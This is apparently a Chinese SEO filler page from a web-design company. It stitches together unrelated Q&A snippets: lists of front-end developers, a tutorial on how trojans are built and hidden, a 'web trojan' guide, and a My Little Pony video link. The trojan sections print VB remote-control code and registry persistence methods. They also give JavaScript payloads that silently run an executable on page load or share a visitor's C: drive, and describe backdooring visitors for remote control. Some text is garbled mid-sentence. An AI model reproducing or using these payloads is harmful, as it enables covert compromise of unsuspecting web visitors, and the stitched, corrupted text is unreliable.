我们专注攀枝花网站设计 攀枝花网站制作 攀枝花网站建设
成都网站建设公司服务热线:400-028-6601

网站建设知识

十年网站开发经验 + 多家企业客户 + 靠谱的建站团队

量身定制 + 运营维护+专业推广+无忧售后,网站问题一站解决

javascript小马,jsp 小马

国内有哪些javascript前端开发牛人

各有各的牛气,说说我知道的:

创新互联坚持“要么做到,要么别承诺”的工作理念,服务领域包括:成都网站建设、网站建设、企业官网、英文网站、手机端网站、网站推广等服务,满足客户于互联网时代的梁溪网站设计、移动媒体设计的需求,帮助企业找到有效的互联网解决方案。努力成为您成熟可靠的网络建设合作伙伴!

JavaScript 语言:周爱民、老赵、玉伯、hax, 月影、CatChen, winter, 白露飞 等等

DOM 和浏览器兼容性:winter, 司徒正美、屈超、怿飞 等等

HTML 和 CSS:彪叔、aoao, 怿飞、macji 等等

类库框架:玉伯、JK, cnberg, yiminghe, 元彦 等等

前端布道士:克军、玉伯、怿飞、秦歌、小马 等等

不知分到哪一类的:hujinpu, 李牧、winter, dexteryy, 李超、老鱼、太伯、陈成 等等一堆人

还有游戏领域,Flash 达人等等,肯定漏了 n 多牛人,欢迎补充。

木马的制造原理是什么?

朋友,如果你已经得到了你想要的答案,希望不要关闭问题或说没有你想要的答案,有些问题是没有正确答案或者很难回答的,希望珍惜大家的帮助!谢谢 (^_^)

这个问题需要详细回答 所以不要嫌多,学东西哪有容易的。

木马攻击原理

特洛伊木马是一个程序,它驻留在目标计算机里,可以随计算机自动启动并在某一端口进行侦听,在对接收的数据识别后,对目标计算机执行特定的操作。木马,其实质只是一个通过端口进行通信的网络客户/服务程序。

1、基本概念:网络客户/服务模式的原理是一台主机提供服务(服务器),另一台主机接受服务(客户机)。作为服务器的主机一般会打开一个默认的端口并进行监听(Listen), 如果有客户机向服务器的这一端口提出连接请求(Connect Request), 服务器上的相应程序就会自动运行,来应答客户机的请求,这个程序称为守护进程(UNIX的术语,不过已经被移植到了MS系统上)。对于特洛伊木马,被控制端就成为一台服务器,控制端则是一台客户机,G_server.exe是守护进程, G_client是客户端应用程序。

2、程序实现:

可以使用VB或VC的Winsock控件来编写网络客户/服务程序, 实现方法如下:

服务器端:

G_Server.LocalPort=7626(冰河的默认端口,可以改为别的值)

G_Server.Listen(等待连接)

客户端:

G_Client.RemoteHost=ServerIP(设远端地址为服务器地址)

G_Client.RemotePort=7626(设远程端口为冰河的默认端口)

(在这里可以分配一个本地端口给G_Client, 如果不分配, 计算机将会自动分配一个)

G_Client.Connect(调用Winsock控件的连接方法)

一旦服务端接到客户端的连接请求ConnectionRequest,就接受连接

Private Sub G_Server_ConnectionRequest(ByVal requestID As Long)

G_Server.Accept requestID

End Sub

客户端用G_Client.SendData发送命令,而服务器在G_Server_DateArrive事件中接受并执行命令(几乎所有的木马功能都在这个事件处理程序中实现)

如果客户断开连接,则关闭连接并重新监听端口

Private Sub G_Server_Close()

G_Server.Close (关闭连接)

G_Server.Listen(再次监听)

End Sub

客户端上传一个命令,服务端解释并执行命令。

3、实现木马的控制功能

由于Win98开放了所有的权限给用户,因此,以用户权限运行的木马程序几乎可以控制一切,下面仅对木马的主要功能进行简单的概述, 主要是使用Windows API函数。

(1)远程监控(控制对方鼠标、键盘,并监视对方屏幕)

keybd_event模拟一个键盘动作。

mouse_event模拟一次鼠标事件

mouse_event(dwFlags,dx,dy,cButtons,dwExtraInfo)dwFlags:

MOUSEEVENTF_ABSOLUTE 指定鼠标坐标系统中的一个绝对位置

MOUSEEVENTF_MOVE 移动鼠标

MOUSEEVENTF_LEFTDOWN 模拟鼠标左键按下

MOUSEEVENTF_LEFTUP 模拟鼠标左键抬起

MOUSEEVENTF_RIGHTDOWN 模拟鼠标右键按下

MOUSEEVENTF_RIGHTUP 模拟鼠标右键按下

dx,dy:MOUSEEVENTF_ABSOLUTE中的鼠标坐标

(2)记录各种口令信息

keylog begin:将击键记录在一个文本文件里,同时还记录执行输入的窗口名

(3)获取系统信息

a.取得计算机名 GetComputerName

b.更改计算机名 SetComputerName

c.当前用户 GetUserName

d.系统路径

Set FileSystem0bject = CreateObject("Scripting.FileSystemObject")(建立文件系统对象)

Set SystemDir = FileSystem0bject.getspecialfolder(1)(取系统目录)

Set SystemDir = FileSystem0bject.getspecialfolder(0)(取Windows安装目录)

e.取得系统版本 GetVersionEx

f.当前显示分辨率

Width = screen.Width\ screen.TwipsPerPixelX

Height= screen.Height \ screen.TwipsPerPixelY

(4)限制系统功能

a.远程关机或重启计算机,使用WinAPI中的如下函数可以实现:

ExitWindowsEx(UINT uFlags,DWORD dwReserved)

当uFlags=EWX_LOGOFF 中止进程,然后注销

=EWX_SHUTDOWN 关掉系统但不关电源

=EWX_REBOOT 重新引导系统

=EWX_FORCE强迫中止没有响应的进程

=EWX_POWERDOWN 关掉系统及关闭电源

b.锁定鼠标,ClipCursor(lpRect As RECT)可以将指针限制到指定区域,或者用ShowCursor(FALSE)把鼠标隐藏起来也可以,RECT是定义的一个矩形。

c.让对方掉线 RasHangUp

d.终止进程 ExitProcess

e.关闭窗口 利用FindWindow函数找到窗口并利用SendMessage函数关闭窗口

(5)远程文件操作

删除文件:File delete

拷贝文件:File copy

共享文件:Export list(列出当前共享的驱动器、目录、权限及共享密码)

(6)注册表操作

在VB中只要Set RegEdit=CreateObject("WScript.Shell")就可以使用以下的注册表功能:

删除键值:RegEdit.RegDelete RegKey

增加键值:RegEdit.Write RegKey,RegValue

获取键值:RegEdit.RegRead (Value)

三、特洛伊木马隐身方法

木马程序会想尽一切办法隐藏自己,主要途径有:在任务栏中隐藏自己,这是最基本的只要把Form的Visible属性设为False、ShowInTaskBar设为False,程序运行时就不会出现在任务栏中了。在任务管理器中隐形:将程序设为“系统服务”可以伪装自己。当然它也会悄无声息地启动,木马会在每次用户启动时自动装载服务端,Windows系统启动时自动加载应用程序的方法,“木马”都会用上,如:启动组、win.ini、system.ini、注册表等等都是“木马”藏身的好地方。

在win.ini文件中,在[WINDOWS]下面,“run=”和“load=”是可能加载“木马”程序的途径,一般情况下,它们的等号后面什么都没有,如果发现后面跟有路径与文件名不是你熟悉的启动文件,你的计算机就可能中上“木马”了。当然你也得看清楚,因为好多“木马”,如“AOL Trojan木马”,它把自身伪装成command.exe文件,如果不注意可能不会发现它不是真正的系统启动文件。

在system.ini文件中,在[BOOT]下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”,如果不是“explorer.exe”,而是“shell= explorer.exe 程序名”,那么后面跟着的那个程序就是“木马”程序,就是说你已经中“木马”了。

在注册表中的情况最复杂,通过regedit命令打开注册表编辑器,在点击至:“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”目录下,查看键值中有没有自己不熟悉的自动启动文件,扩展名为EXE,这里切记:有的“木马”程序生成的文件很像系统自身文件,想通过伪装蒙混过关,如“Acid Battery v1.0木马”,它将注册表“HKEY-LOCAL-MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”下的 Explorer 键值改为Explorer=“C:\WINDOWS\expiorer.exe”,“木马”程序与真正的Explorer之间只有“i”与“l”的差别。当然在注册表中还有很多地方都可以隐藏“木马”程序,如:“HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Run”、“HKEY-USERS\****\Software\Microsoft\Windows\CurrentVersion\Run”的目录下都有可能,最好的办法就是在“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”下找到“木马”程序的文件名,再在整个注册表中搜索即可。

目前,除了上面介绍的隐身技术外,更新、更隐蔽的方法已经出现,那就是-驱动程序及动态链接库技术。驱动程序及动态链接库技术和一般的木马不同,它基本上摆脱了原有的木马模式-监听端口,而采用替代系统功能的方法(改写驱动程序或动态链接库)。这样做的结果是:系统中没有增加新的文件(所以不能用扫描的方法查杀)、不需要打开新的端口(所以不能用端口监视的方法查杀)、没有新的进程(所以使用进程查看的方法发现不了它,也不能用kill进程的方法终止它的运行)。在正常运行时木马几乎没有任何的症状,而一旦木马的控制端向被控端发出特定的信息后,隐藏的程序就立即开始运作。

四、 特洛伊木马防御原理

知道了木马的攻击原理和隐身方法,我们就可以采取措施进行防御了。

1.端口扫描

端口扫描是检查远程机器有无木马的最好办法, 端口扫描的原理非常简单, 扫描程序尝试连接某个端口, 如果成功, 则说明端口开放,如果失败或超过某个特定的时间(超时), 则说明端口关闭。但对于驱动程序/动态链接木马, 扫描端口是不起作用的。

2.查看连接接

查看连和端口扫描的原理基本相同,不过是在本地机上通过netstat -a(或某个第三方程序)查看所有的TCP/UDP连接,查看连接要比端口扫描快,但同样是无法查出驱动程序/动态链接木马,而且仅仅能在本地使用。

3.检查注册表

上面在讨论木马的启动方式时已经提到,木马可以通过注册表启动(好像现在大部分的木马都是通过注册表启动的,至少也把注册表作为一个自我保护的方式),那么,我们同样可以通过检查注册表来发现冰河在注册表里留下的痕迹。

4.查找文件

查找木马特定的文件也是一个常用的方法,木马的一个特征文件是kernl32.exe,另一个是sysexlpr.exe,只要删除了这两个文件,木马就已经不起作用了。如果你只是删除了sysexlpr.exe而没有做扫尾工作的话,可能会遇到一些麻烦-就是你的文本文件打不开了, sysexplr.exe是和文本文件关联的,你还必须把文本文件跟notepad关联上。

另外,对于驱动程序/动态链接库木马,有一种方法可以试试,使用Windows的"系统文件检查器",通过"开始菜单"-"程序"-"附件"-"系统工具"-"系统信息"-"工具"可以运行"系统文件检查器", 用“系统文件检查器”可检测操作系统文件的完整性,如果这些文件损坏,检查器可以将其还原,检查器还可以从安装盘中解压缩已压缩的文件(如驱动程序)。如果你的驱动程序或动态链接库在你没有升级它们的情况下被改动了,就有可能是木马(或者损坏了),提取改动过的文件可以保证你的系统安全和稳定。

制作网页木马原理

大家对木马都不陌生了,它可能要算是计算机病毒史上最厉害的了,相信会使木马的人千千万万,但是有很多人苦于怎么把木马发给对方,现在随着计算机的普及,在网络上我相信很少有人会再轻易的接收对方的文件了,所以网页木马诞生了。

1.它应该算是html带动同路径下的一个exe的文件的主页了,也就是当浏览器浏览这个页面的时候,一个exe的文件就在后台自动下载并执行了,可以做一个test.html的文件在桌面,内容如下:

script language="javascript"

run_exe="OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""

run_exe+="CODEBASE=\"test.exe#version=1,1,1,1\""

run_exe+="PARAM NAME=\"_Version\" value=\"65536\""

run_exe+="/OBJECT"

run_exe+="HTMLH1网页加载中,请稍后..../H1/HTML";

document.open();

document.clear();

document.writeln(run_exe);

document.close();

/script

再在桌面下随便找个exe的文件,名字一定要改为tset.exe,好了,这时候双击我们刚才生成的html文件,当看到“网页加载中,请稍后....”的时候,我们的那个同路径下的exe文件也被无条件执行了,这种页面的优点就是编译修改简单,但是!当你申请下了一个个人主页空间的时候,把这两个文件上传上去的时候,当你试图通过浏览器浏览你的杰作的时候,ie的安全警告跳了出来,我想没有几个人愿意乖乖的冒着风险去点“是”,好了,尽管这个网页木马在本地是多么的完美,但是放到了网上就通不过ie的安全策略了,这个小马失败了。

2.是通过ie自身的漏洞写入注册表,相信很多人经常在浏览一些主页的时候,注册表被改的乱七八糟、ie标题被改、首页被改、注册表编辑器被禁用等等,这些都是自动修改了你的注册表的网页的杰作,所以我门也可以做个页面让浏览者的硬盘完全共享,也是做个html的文件,内容如下:

script language=javascript

document.write("APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent/APPLET");

function f(){

a1=document.applets[0];

a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");

a1.createInstance();

Shl = a1.GetObject();

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags",402,"REG_DWORD");

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD"

);

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\");

}

function init()

{

setTimeout("f()", 1000);

}

init();

/script

当对方的浏览过这个页面的时候,他的c:就被共享了,共享后的进入方法嘛..呵呵不用说了吧,但是他虽然被共巷了,但是你还不知道谁正在看你的这个页面,他的ip又是多少你都不知道,没有关系,有个很简单的方法,去163申请一个域名的转换,如:连接目标地址里...褪枪蚕砹�恿恕?/a

这种网页木马的特点是比较安全,不宜被对方发现,但是使用麻烦需要牵扯到很多的东西。

3.也是现在最好用的一种了吧,个人认为。它是将一个小巧的exe文件作成一个.eml的文件,再用ie的漏洞让一个html的页面执行这个.eml的文件,你的那个小巧的exe文件就被执行了,由于代码过长又因每个exe文件转换后的代码不同所以不可能一一写出,下面给出一个地址实际上就是一个转...憧梢酝ü齮elnet x.x.x.x 3389来完全控制对方(这个5k的小后门是winshell5.0黑白网络有下,同时这个winshell5.0还有一个很出色的功能,就是能下载一个你事先设置好的指定路径下的一个文件,并执行他,我放置的是网络深偷,如果你的杀毒软件够厉害的话,神偷是可以被查出来的,这里只是实验,实际中可以指定很多查不到的小马,这里不阐述),有兴趣的朋友可以来试试。

这种网页木马的特点是,对方挨种率较高,除了制作麻烦一点外,没有什么缺点啦

好了所有的漏洞都是建立在系统漏洞的前提下,多升级多打补丁没有坏处

国内有哪些前端开发牛人?

目前随着科技的发展,国家的进步,各行各样涌现出了许许多多的人才与前段开发牛人

今天就介绍一些行业的前段开发牛人

avaScript语言:周爱民、老赵、玉伯、hax,月影、CatChen, winter, 白露飞 等等

DOM 和浏览器兼容性:winter, 司徒正美、屈超、怿飞 等等

HTML 和 CSS:彪叔、aoao, 怿飞、macji 等等

类库框架:玉伯、JK, cnberg, yiminghe, 元彦 等等

前端布道士:克军、玉伯、怿飞、秦歌、小马 等等

不知分到哪一类的:hujinpu, 李牧、winter,dexteryy, 李超、老鱼、太伯、陈成 等等一堆人

百度的玉北,GrayZhang,携程的大漠,林小志,前段乱炖的芋头

云适配的陈本峰 javascript还有一个不会营销的大牛,席新亮,是很多群的群主,天天回答js问题,不过很少在论坛和博客上看到它。土豆前端开发工程师:西点王子-知乎

知乎专栏:web前端开发知乎专栏目

《锋利的jquery 作者》 - 单东林。不敢说多牛,但是是我敬佩的师傅。

林小志大神。从小看《css那些事儿》长大的

:还有#@just.jayac到他的关于页面,很有Geek风格总之,现在的前段牛人各行各业都有很多了。不仅仅只是限于腾讯与淘宝的科技开发人员了。更多的活跃于flash与游戏领域。只要大家多多发掘,也可以认识许许多多的牛人大神。

我的世界小马宝莉js

链接:

提取码:4EZr

这里有小马宝莉全系列1-7季的全部视频,希望能帮到您。

小马宝莉:友谊是魔法(My Little Pony: Friendship is Magic)由美国玩具商孩之宝于2010年10月10日在美国探索家庭电视频道开始播出的卡通影集,共221集。故事叙述了小马Twilight Sparkle(紫悦/暮光闪闪)为了执行导师Princess Celestia(宇宙公主/塞拉丝蒂娅公主)给她的任务,与助手Spike(穗龙/斯派克)一起来到Ponyville(小马谷/小马镇)学习有关友谊魔法的知识,在学习和生活的过程中她结识了五位好朋友,并获得了真正的友谊,与朋友们共同守护Equestria(小马利亚/小马国)。

小马宝莉一般指的是小马宝莉:友谊是魔法(Mylittle Pony: Friendship is Magic),这是整个系列中的第四代(Generation 4)。"小马宝莉"是系列的第四代的官方译名,在此之前的几代曾被称作"小马驹"或"我的小马驹"。


当前标题:javascript小马,jsp 小马
本文路径:http://shouzuofang.com/article/dsdjehd.html

其他资讯